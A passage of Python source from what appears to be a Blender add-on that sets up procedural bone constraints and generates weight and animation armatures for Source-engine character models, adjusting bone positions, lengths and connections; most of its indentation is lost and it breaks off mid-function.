                                    if self.helper_bones['arms']['wrist'] and self.helper_bones['arms']['wrist'][0] == 'h2.wrist':
                                        transform.to_min_y_rot = radians(45)
                                        transform.to_max_y_rot = radians(-45)
                                    else:
                                        transform.to_min_y_rot = radians(5)
                                        transform.to_max_y_rot = radians(-5)
                                    prefix, bone = bone_convert(self.symmetrical_bones['arms']['upperarm'][index])
                                    transform.subtarget = prefix + bone
                            elif container == 'thumbroot':
                                transform.from_min_y_rot = radians(-45)
                                transform.from_max_y_rot = radians(45)
                                transform.from_min_z_rot = radians(-75)
                                transform.from_max_z_rot = radians(75)
                                # Mirror the Y response between left (0) and right (1) thumbs.
                                if index == 0:
                                    transform.to_min_y_rot = radians(30)
                                    transform.to_max_y_rot = radians(-30)
                                else:
                                    transform.to_min_y_rot = radians(-30)
                                    transform.to_max_y_rot = radians(30)
                                transform.to_min_z_rot = radians(-45)
                                transform.to_max_z_rot = radians(45)
                                prefix, bone = bone_convert(self.symmetrical_bones['fingers']['finger0'][index])
                                transform.subtarget = prefix + bone
    if new:
        print("Procedural bones configured!")
    # NOTE(review): indentation reconstructed — assumed the bake flag is
    # refreshed on every call, not only when new constraints were added.
    if vatinfo.viewmodel:
        vatproperties.bake_helper_bones = True
    else:
        vatproperties.bake_helper_bones = False
#Some functions (Namely creating new bones) do not add the newly created info to the object data until a mode change occurs at least once
def update(type, object=None):
    """Force a mode round-trip so freshly created data registers in Blender.

    type 0: simple OBJECT->EDIT toggle to flush new bones into object data.
    type 1 (with *object*): additionally deselects everything and makes
    *object* the active selection before entering edit mode, since
    ``data.edit_bones`` is only populated while in edit mode.
    """
    if type == 0:
        # Plain toggle on the current active object.
        bpy.ops.object.mode_set(mode='OBJECT')
        bpy.ops.object.mode_set(mode='EDIT')
        return
    if type == 1 and object:
        # Refocus selection onto the given object before editing it.
        bpy.ops.object.mode_set(mode='OBJECT')
        bpy.ops.object.select_all(action='DESELECT')
        object.select_set(True)
        bpy.context.view_layer.objects.active = object
        bpy.ops.object.mode_set(mode='EDIT')
def convert_armature_to_source():
    """Stub: conversion of an armature to the Source scheme is not implemented yet."""
    # Kept for parity with the original: touches the add-on properties but does nothing.
    vatproperties = bpy.context.scene.vatproperties
def generate_armature(type, action): #Creates or deletes the weight armature
vatinfo = bpy.context.scene.vatinfo
real_armature = bpy.data.armatures[arm.armature_real.name]
unit = vatinfo.unit
#Creation
if action == 0:
#Weight armature datablock
if type == 'weight':
arm.weight_armature_real = real_armature.copy()
arm.weight_armature_real.name = arm.armature_real.name + '.weight'
#Creation and link to current scene
arm.weight_armature = bpy.data.objects.new(arm.armature.name + '.weight', arm.weight_armature_real)
vatinfo.weight_armature = True
collection = arm.armature.users_collection[0]
collection.objects.link(arm.weight_armature)
armature = arm.weight_armature
#Animation armature datablock
elif type == 'anim':
arm.animation_armature_real = real_armature.copy()
arm.animation_armature_real.name = arm.armature_real.name + '.anim_setup'
#Creation and link to current scene
arm.animation_armature = bpy.data.objects.new(arm.armature.name + '.anim_setup', arm.animation_armature_real)
vatinfo.animation_armature = True
collection = arm.armature.users_collection[0]
collection.objects.link(arm.animation_armature)
armature = arm.animation_armature
#Focuses on newly created armature
update(1, armature)
##Unimportant bone removal##
#Removes bones such as weapon or attachment bones
if arm.other_bones:
for container, bone in arm.other_bones.items():
for bone in bone:
if bone:
if container == 'forward' or container == 'root' or container == 'ik' or bone == 'p2.ValveBiped':
prefix, bone = bone_convert(bone)
bone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(bone)
elif type == 'weight':
prefix, bone = bone_convert(bone)
bone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(bone)
#Keeps only the bare minimum bones for Rigify
if type == 'anim':
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(ebone)
elif type == 'weight':
#Removes wrist helpers for viewmodels since i've never seen them used for anything and they mess with weight generation
for container, bone in arm.helper_bones['viewmodel'].items():
if container != 'thumbroot' and container != 'forearm_driven':
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(ebone)
##Setup for armatures, tweaking bone positions and the like##
arm.chainless_bones = []
arm.chain_start = []
#Temporal list with prefixes taken out
custom_bones = []
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone = bone_convert(bone)
custom_bones.append(bone)
#Custom bones, placed first so changes to the standard bones by them are overwritten later
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone2 = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone2]
pbone = armature.pose.bones[prefix + bone2]
marked = False
if ebone.parent:
parent = ebone.parent.name
if custom_bones.count(parent.replace(prefix, '')):
marked = True
parent = ebone.parent
#If bone's parent is not any of the default ones
if marked:
#Avoids Blender deleting the bone if the connection causes the child bone to have virtually 0 length
if ebone.tail != parent.tail and ebone.head != parent.head:
parent.tail = pbone.head
#Straightens the first bone of a line
if not ebone.children:
length = parent.length
parent.length = parent.length*2
ebone.tail = parent.tail
parent.length = length
if len(parent.children) < 2:
ebone.use_connect = True
if not ebone.use_connect and ebone.children:
arm.chain_start.append(bone)
else:
if not ebone.children:
arm.chainless_bones.append(bone)
if ebone.length < 0.3*unit:
pbone.rotation_quaternion[3] = -1
pbone.scale = 5,5,5
if not ebone.use_connect and ebone.children:
if type == 'anim':
pbone.rigify_type = 'basic.super_copy'
pbone.rigify_parameters.super_copy_widget_type = 'bone'
#arm.chain_start.append(bone)
#Isolated bones for the custom bones
if type == 'anim':
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone2 = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone2]
pbone = armature.pose.bones[prefix + bone2]
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone2 + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone2].head
isolatedbone.tail = armature.pose.bones[prefix + bone2].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone2].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone2]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
#Symmetrical bones
for cat in arm.symmetrical_bones.keys():
for container, bone in arm.symmetrical_bones[cat].items():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if type == 'anim':
#Creates copy of bone that retains the original rotation for the retarget empties
if vatinfo.scheme == 0 and not vatinfo.sbox:
bone2 = armature_rename.bone_rename(1, bone, index)
isolatedbone = armature.data.edit_bones.new(prefix + bone2 + ".isolated")
else:
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
ebone = armature.data.edit_bones[prefix + bone]
pbone = armature.pose.bones[prefix + bone]
parent = ebone.parent
if arm.central_bones['pelvis']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
if parent.name == prefix + bone:
continue
else:
parent.tail = pbone.head
else:
parent.tail = pbone.head
#Filters out bones whose parent should not be connected to them
if container == 'thigh' or container == 'clavicle' or container == 'finger0' or container == 'finger1' or container == 'finger2' or container == 'finger3' or container == 'finger4' or container == 'fingercarpal' or container == 'indexmeta' or container == 'middlemeta' or container == 'ringmeta':
continue
else:
if type == 'weight':
if container == 'calf' or container == 'upperarm' or container == 'forearm' or container == 'hand':
continue
elif vatinfo.sbox and container == 'foot':
continue
ebone.use_connect = True
#Helper bones tweak if weight armature
if type == 'weight':
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
for bone in bone:
if bone:
if container.count('thumb') or container.count('wrist') or container.count('ulna') or container.count('forearm'):
continue
prefix, bone = bone_convert(bone)
pbone = armature.pose.bones[prefix + bone]
ebone = armature.data.edit_bones[prefix + bone]
parent = armature.data.edit_bones[prefix + bone].parent
if cat != 'others':
parent.tail = pbone.head
#Filters out bones whose parent should not be connected to them
if container == 'knee' or container == 'elbow' or container == 'quadricep' or container == 'bicep' or container == 'shoulder' or cat == 'others':
continue
else:
ebone.use_connect = True
#Central bones
for container, bone in arm.central_bones.items():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if type == 'anim':
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
pbone = armature.pose.bones[prefix + bone]
ebone = armature.data.edit_bones[prefix + bone]
#No parent
if container != 'pelvis':
if armature.data.edit_bones[prefix + bone].parent:
parent = armature.data.edit_bones[prefix + bone].parent
if arm.central_bones['pelvis']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
if parent.name == prefix + bone and container != 'spine':
continue
else:
parent.tail = pbone.head
else:
parent.tail = pbone.head
#Neck should not be connected to its parent
if container.count('neck') == 0:
ebone.use_connect = True
#Extends head's length to be on par with actual head height
if container == 'head':
if vatinfo.goldsource: #Update the remaining 2 to *unit
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 10*unit
elif vatinfo.sbox:
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 35*unit
else:
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 6*unit
if type == 'anim':
for container, bone in arm.other_bones.items():
if container == 'weapon' or container == 'viewmodel':
for bone in bone:
if bone:
if container == 'weapon' or bone.title().count('Camera'):
prefix, bone = bone_convert(bone)
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
##Bone tweaks##
#Extends toe tip to be where the actual tip should be
for index, bone in enumerate(arm.symmetrical_bones['legs']['toe0']):
if bone:
prefix, bone = bone_convert(bone)
etoe = armature.data.edit_bones[prefix + bone]
ptoe = armature.pose.bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('toe01') and arm.symmetrical_bones['legs']['toe01'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['toe01'][index])
etoe01 = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('toe02') and arm.symmetrical_bones['legs']['toe02'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['toe02'][index])
etoe02 = armature.data.edit_bones[prefix + bone]
length = etoe01.length
etoe01.length = etoe01.length*1.25
etoe02.tail = etoe01.tail
etoe01.length = length
else:
length = etoe.length
etoe.length = etoe.length*1.25
etoe01.tail = etoe.tail
etoe.length = length
else:
if vatinfo.sbox:
armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x, -8*unit, ptoe.head.z
elif arm.symmetrical_bones['legs'].get('thighlow'):
armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x*1.1, -2*unit, ptoe.head.z
else:
armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x*1.1, -7*unit, ptoe.head.z
#Extends hand bone
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
ehand = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eforearm = armature.data.edit_bones[prefix + bone]
length = eforearm.length
if vatinfo.sbox:
eforearm.length = eforearm.length*1.5
elif arm.symmetrical_bones['legs'].get('thighlow'):
eforearm.length = eforearm.length*1.75
else:
eforearm.length = eforearm.length*1.25
ehand.tail = eforearm.tail
eforearm.length = length
#Extends feet bone if no toe bone is present
for index, bone in enumerate(arm.symmetrical_bones['legs']['foot']):
if bone:
prefix, bone = bone_convert(bone)
efoot = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['legs']['toe0'] or not arm.symmetrical_bones['legs']['toe0'][index]:
if efoot.tail.y < 0:
efoot.tail.y = efoot.tail.y*5
elif efoot.tail.y > 0:
efoot.tail.y = efoot.tail.y*-5
efoot.tail.z = efoot.tail.z*0.4
#Extends forearm bone if no hand bone is present
for index, bone in enumerate(arm.symmetrical_bones['arms']['upperarm']):
if bone:
prefix, bone = bone_convert(bone)
eupperarm = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['arms']['hand'] or not arm.symmetrical_bones['arms']['hand'][index]:
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eforearm = armature.data.edit_bones[prefix + bone]
length = eupperarm.length
eupperarm.length = eupperarm.length*2.5
eforearm.tail = eupperarm.tail
eupperarm.length = length
#Extends calf bone if no feet bone is present
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
if not arm.symmetrical_bones['legs']['foot'] or not arm.symmetrical_bones['legs']['foot'][index]:
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
ecalf = armature.data.edit_bones[prefix + bone]
length = ethigh.length
ethigh.length = ethigh.length*2
ecalf.tail = ethigh.tail
ethigh.length = length
if type == 'anim':
#Fix for legs/arms rotating the wrong way in most characters with the animation armature
for index, bone in enumerate(arm.symmetrical_bones['arms']['forearm']):
if bone:
prefix, bone = bone_convert(bone)
eforearm = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['upperarm'] and arm.symmetrical_bones['arms']['upperarm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
eupperarm = armature.data.edit_bones[prefix + bone]
if eforearm.head.y <= eupperarm.head.y:
eforearm.head.y = eupperarm.head.y + 0.25*unit
for index, bone in enumerate(arm.symmetrical_bones['legs']['calf']):
if bone:
prefix, bone = bone_convert(bone)
ecalf = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs']['thigh'] and arm.symmetrical_bones['legs']['thigh'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thigh'][index])
ethigh = armature.data.edit_bones[prefix + bone]
if ecalf.head.y > ethigh.head.y:
ecalf.head.y = ethigh.head.y - 0.25*unit
##Weight armature bone tweaks##
elif type == 'weight':
##Knee/Elbow##
for index, bone in enumerate(arm.helper_bones['arms']['elbow']):
if bone:
prefix, bone = bone_convert(bone)
pelbow = armature.pose.bones[prefix + bone]
eelbow = armature.data.edit_bones[prefix + bone]
eelbow.tail.xyz = pelbow.head.x, pelbow.head.y + 5*unit, pelbow.head.z
for index, bone in enumerate(arm.helper_bones['legs']['knee']):
if bone:
prefix, bone = bone_convert(bone)
pknee = armature.pose.bones[prefix + bone]
eknee = armature.data.edit_bones[prefix + bone]
eknee.tail.xyz = pknee.head.x, pknee.head.y - 5*unit, pknee.head.z
##Trapezius##
for index, bone in enumerate(arm.symmetrical_bones['arms']['clavicle']):
if bone:
if arm.helper_bones['arms']['trapezius'] and arm.helper_bones['arms']['trapezius'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['trapezius'][index])
etrapezius = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['arms']['upperarm'] and arm.symmetrical_bones['arms']['upperarm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['upperarm'][index])
pupperarm = armature.pose.bones[prefix + bone]
etrapezius.tail = pupperarm.head
##Shoulder/Bicep##
for index, bone in enumerate(arm.symmetrical_bones['arms']['upperarm']):
if bone:
prefix, bone = bone_convert(bone)
eupperarm = armature.data.edit_bones[prefix + bone]
#Forces upperarm to use shoulder's position if it exists
if arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['shoulder'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
pshoulder = armature.pose.bones[prefix + bone]
eupperarm.tail = pshoulder.head
#Forces upperarm to use bicep's position if they exist
elif arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
eupperarm.tail = pbicep.head
#If shoulder and bicep are present
if arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['shoulder'][index] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
eshoulder = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
ebicep = armature.data.edit_bones[prefix + bone]
eshoulder.head = eupperarm.head
eupperarm.head = eshoulder.tail
eupperarm.tail = pbicep.head
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
ebicep.tail = pforearm.head
#Else if only shoulder is present
elif arm.helper_bones['arms']['shoulder'] and arm.helper_bones['arms']['shoulder'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][index])
eshoulder = armature.data.edit_bones[prefix + bone]
eshoulder.head = eupperarm.head
eupperarm.head = eshoulder.tail
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
eupperarm.tail = pforearm.head
#Else if only bicep is present
elif arm.helper_bones['arms']['bicep'] and arm.helper_bones['arms']['bicep'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['bicep'][index])
pbicep = armature.pose.bones[prefix + bone]
ebicep = armature.data.edit_bones[prefix + bone]
eupperarm.tail = pbicep.head
if arm.symmetrical_bones['arms']['forearm'] and arm.symmetrical_bones['arms']['forearm'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['forearm'][index])
pforearm = armature.pose.bones[prefix + bone]
ebicep.tail = pforearm.head
##Ulna/Wrist##
for index, bone in enumerate(arm.symmetrical_bones['arms']['forearm']):
if bone:
prefix, bone = bone_convert(bone)
eforearm = armature.data.edit_bones[prefix + bone]
#Force forearm to use forearm_driven's position if available
if arm.helper_bones['viewmodel']['forearm_driven'] and arm.helper_bones['viewmodel']['forearm_driven'][index]:
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['forearm_driven'][index])
pforearm_driven = armature.pose.bones[prefix + bone]
eforearm.tail = pforearm_driven.head
else:
if arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['ulna'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
pulna = armature.pose.bones[prefix + bone]
eforearm.tail = pulna.head
if arm.symmetrical_bones['arms']['hand'] and arm.symmetrical_bones['arms']['hand'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['hand'][index])
phand = armature.pose.bones[prefix + bone]
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['ulna'] and arm.helper_bones['viewmodel']['forearm_driven'] and arm.helper_bones['arms']['ulna'][index] and arm.helper_bones['viewmodel']['forearm_driven'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['forearm_driven'][index])
eforearm_driven = armature.data.edit_bones[prefix + bone]
eforearm_driven.tail = eulna.head
#If both ulna and wrist are present
elif arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['ulna'][index] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
eulna.length = eulna.length/1.6
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
ewrist.head = eulna.tail
ewrist.tail = phand.head
#Else if only ulna is present
elif arm.helper_bones['arms']['ulna'] and arm.helper_bones['arms']['ulna'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['ulna'][index])
eulna = armature.data.edit_bones[prefix + bone]
eulna.tail = phand.head
#Else if only wrist is present
elif arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
eforearm.length = eforearm.length/1.3
ewrist.head = eforearm.tail
ewrist.tail = phand.head
eforearm.tail = ewrist.head
ewrist.use_connect = True
else: #If neither are present
eforearm.tail = phand.head
ehand.use_connect = True
##Quadricep##
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
#bone2 present to avoid problems with the last condition
#Force thigh to use quad's position if available
if arm.helper_bones['legs']['quadricep'] and arm.helper_bones['legs']['quadricep'][index]:
prefix2, bone2 = bone_convert(arm.helper_bones['legs']['quadricep'][index])
pquadricep = armature.pose.bones[prefix2 + bone2]
equadricep = armature.data.edit_bones[prefix2 + bone2]
ethigh.tail = pquadricep.head
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix2, bone2 = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
pcalf = armature.pose.bones[prefix2 + bone2]
equadricep.tail = pcalf.head
#Gluteus (Only for Zoey)
if arm.helper_bones['others'].get('gluteus'):
if arm.helper_bones['others']['gluteus'] and arm.helper_bones['others']['gluteus'][index]:
prefix2, bone2 = bone_convert(arm.helper_bones['others']['gluteus'][index])
pgluteus = armature.pose.bones[prefix2 + bone2]
pgluteus.rotation_quaternion[3] = -1
pgluteus.scale.xyz = 25,25,25
bpy.ops.object.mode_set(mode='POSE')
armature.data.bones[prefix2 + bone2].select = True
bpy.ops.pose.armature_apply(selected=True)
bpy.ops.pose.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='EDIT')
ethigh = armature.data.edit_bones[prefix + bone]
egluteus = armature.data.edit_bones[prefix2 + bone2]
ethigh.head = egluteus.tail
#Shoulder1 (Only for Louis)
if arm.helper_bones['arms'].get('shoulder1'):
if arm.symmetrical_bones['arms']['clavicle']:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['clavicle'][0])
eclavicle = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['shoulder']:
prefix, bone = bone_convert(arm.helper_bones['arms']['shoulder'][0])
eshoulder = armature.data.edit_bones[prefix + bone]
eclavicle.tail = eshoulder.head
elif arm.symmetrical_bones['arms']['upperarm']:
prefix, bone = bone_convert(arm.symmetrical_bones['arms']['upperarm'][0])
eupperarm = armature.data.edit_bones[prefix + bone]
eclavicle.tail = eupperarm.head
##Thumbroot## (Only for viewmodels)
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
phand = armature.pose.bones[prefix + bone]
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['viewmodel']['thumbroot'] and arm.helper_bones['viewmodel']['thumbroot'][index]:
prefix, bone = bone_convert(arm.helper_bones['viewmodel']['thumbroot'][index])
ethumbroot = armature.data.edit_bones[prefix + bone]
ethumbroot.head = phand.head
if arm.symmetrical_bones['fingers']['finger0'] and arm.symmetrical_bones['fingers']['finger0'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers']['finger0'][index])
pfinger0 = armature.pose.bones[prefix + bone]
ethumbroot.tail = pfinger0.head
if vatinfo.sbox:
for index, bone in enumerate(arm.symmetrical_bones['legs']['thigh']):
if bone:
prefix, bone = bone_convert(bone)
ethigh = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['legs']['quadricep'] and arm.helper_bones['legs']['quadricep'][index]:
prefix, bone = bone_convert(arm.helper_bones['legs']['quadricep'][index])
equadricep = armature.data.edit_bones[prefix + bone]
equadricep.head = ethigh.head
equadricep.length = equadricep.length / 3
ethigh.head = equadricep.tail
if arm.symmetrical_bones['legs']['calf'] and arm.symmetrical_bones['legs']['calf'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['calf'][index])
ecalf = armature.data.edit_bones[prefix + bone]
ethigh.tail = ecalf.head
for index, bone in enumerate(arm.symmetrical_bones['legs']['foot']):
if bone:
prefix, bone = bone_convert(bone)
efoot = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['legs'].get('lowerleg') and arm.helper_bones['legs']['lowerleg'][index]:
prefix, bone = bone_convert(arm.helper_bones['legs']['lowerleg'][index])
elowerleg = armature.data.edit_bones[prefix + bone]
elowerleg.tail = efoot.head
for index, bone in enumerate(arm.symmetrical_bones['arms']['hand']):
if bone:
prefix, bone = bone_convert(bone)
ehand = armature.data.edit_bones[prefix + bone]
if arm.helper_bones['arms']['wrist'] and arm.helper_bones['arms']['wrist'][index]:
prefix, bone = bone_convert(arm.helper_bones['arms']['wrist'][index])
ewrist = armature.data.edit_bones[prefix + bone]
ewrist.length = ewrist.length*1.35
ehand.tail = ewrist.tail
ewrist.length = ewrist.length/1.5
ehand.head = ewrist.tail
if vatinfo.titanfall:
#Changes pelvis position to avoid deletion
if arm.central_bones['pelvis'] and arm.central_bones['spine1']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
epelvis = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine1'][0])
espine1 = armature.data.edit_bones[prefix + bone]
epelvis.tail = espine1.head
epelvis.length = epelvis.length/3
#Aligns calf to the thigh
for index, bone in enumerate(arm.symmetrical_bones['legs']['calf']):
if bone:
prefix, bone = bone_convert(bone)
ecalf = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('thighlow') and arm.symmetrical_bones['legs']['thighlow'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thighlow'][index])
ethighlow = armature.data.edit_bones[prefix + bone]
ecalf.head = ethighlow.tail
ecalf.use_connect = True
elif arm.symmetrical_bones['legs']['thigh'] and arm.symmetrical_bones['legs']['thigh'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['thigh'][index])
ethigh = armature.data.edit_bones[prefix + bone]
ecalf.head = ethigh.tail
#Removes head bone since it serves no purpose and neck2 serves its purpose anyways, and repositions both neck bones to be more accurate to where they would really be
if arm.central_bones['head'] and arm.central_bones['neck'] and arm.central_bones.get('neck2'):
prefix, bone = bone_convert(arm.central_bones['head'][0])
ehead = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck'][0])
eneck = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck2'][0])
eneck2 = armature.data.edit_bones[prefix + bone]
eneck.tail = eneck2.head
eneck2.tail = ehead.tail
eneck2.parent = eneck
eneck2.use_connect = True
armature.data.edit_bones.remove(ehead)
#Corrects central bones roll values to 0
if type == 'anim':
for container, bone in arm.central_bones.items():
for bone in bone:
if bone:
if vatinfo.titanfall and bone.title().count('Head'):
continue
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
ebone.roll = 0
#Finger tips tweak
for container, bone in arm.symmetrical_bones['fingers'].items():
if container == 'finger0' or container == 'finger1' or container == 'finger2' or container == 'finger3' or container == 'finger4':
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
tip = container[0:7] + '2'
middle = container[0:7] + '1'
if arm.symmetrical_bones['fingers'][tip] and arm.symmetrical_bones['fingers'][tip][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][middle][index])
ebone = armature.data.edit_bones[prefix + bone]
length = ebone.length
ebone.length = length*2
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][tip][index])
armature.data.edit_bones[prefix + bone].tail.xyz = ebone.tail.x, ebone.tail.y, ebone.tail.z
ebone.length = length
elif arm.symmetrical_bones['fingers'][middle] and arm.symmetrical_bones['fingers'][middle][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][container][index])
ebone = armature.data.edit_bones[prefix + bone]
length = ebone.length
ebone.length = length*2
prefix, bone = bone_convert(arm.symmetrical_bones['fingers'][middle][index])
armature.data.edit_bones[prefix + bone].tail = ebone.tail
ebone.length = length
#If no head
if not arm.central_bones['head']:
ebone = None
ebone2 = None
if arm.central_bones['spine4'] and arm.central_bones['spine2']:
prefix, bone = bone_convert(arm.central_bones['spine2'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine4'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
elif arm.central_bones['spine3'] and arm.central_bones['neck']:
